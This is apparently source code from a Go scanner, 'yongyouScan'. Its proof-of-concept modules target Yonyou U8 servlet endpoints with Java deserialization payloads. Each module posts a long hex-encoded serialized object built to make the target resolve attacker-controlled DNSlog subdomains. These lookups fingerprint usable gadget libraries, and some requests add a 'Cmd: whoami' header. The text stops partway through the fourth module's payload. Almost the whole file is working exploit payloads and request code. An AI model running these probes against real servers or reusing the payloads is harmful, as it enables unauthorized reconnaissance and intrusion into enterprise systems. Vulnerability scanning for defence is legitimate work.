/pkg/POC/U8-CacheInvokeServlet/U8-CacheInvokeServlet.go:
--------------------------------------------------------------------------------
 1 | package U8_CacheInvokeServlet
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/service/~iufo/com.ufsoft.iufo.web.appletinvoke.CacheInvokeServlet"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "20327",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 U8 CacheInvokeServlet反序列化漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 U8 CacheInvokeServlet反序列化漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 U8 CacheInvokeServlet反序列化漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/U8-ClientRequestDispatch/U8-ClientRequestDispatch.go:
--------------------------------------------------------------------------------
 1 | package U8_ClientRequestDispatch
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/service/~iufo/nc.ui.iufo.jiuqi.ClientRequestDispatch"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "16284",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 U8 ClientRequestDispatch反序列化漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 U8 ClientRequestDispatch反序列化漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 U8 ClientRequestDispatch反序列化漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/u8-ServletCommander/u8-ServletCommander.go:
--------------------------------------------------------------------------------
 1 | package u8_ServletCommander
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/service/~tbb/nc.bs.ntb.plugin.ServletCommander"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Cmd":            "whoami",
24 | 		"Content-Length": "20327",
25 | 		"Content-Type":   "application/x-www-form-urlencoded",
26 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
27 | 	if err != nil {
28 | 		color.Red.Println("[-] 用友 U8 ServletCommander反序列化漏洞不存在")
29 | 		return
30 | 	}
31 | 	if dnslog.GetDnslogRecord(session) {
32 | 		color.Green.Println("[+] 用友 U8 ServletCommander反序列化漏洞存在 -> " + url)
33 | 		return
34 | 	}
35 | 	color.Red.Println("[-] 用友 U8 ServletCommander反序列化漏洞不存在")
36 | }
37 | 


--------------------------------------------------------------------------------
/pkg/POC/U8-FileTransportServlet/U8-FileTransportServlet.go:
--------------------------------------------------------------------------------
 1 | package u8_FileTransportServlet
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/service/~iufo/nc.ui.iufo.server.center.FileTransportServlet"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Cmd":            "whoami",
24 | 		"Content-Length": "20327",
25 | 		"Content-Type":   "application/x-www-form-urlencoded",
26 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6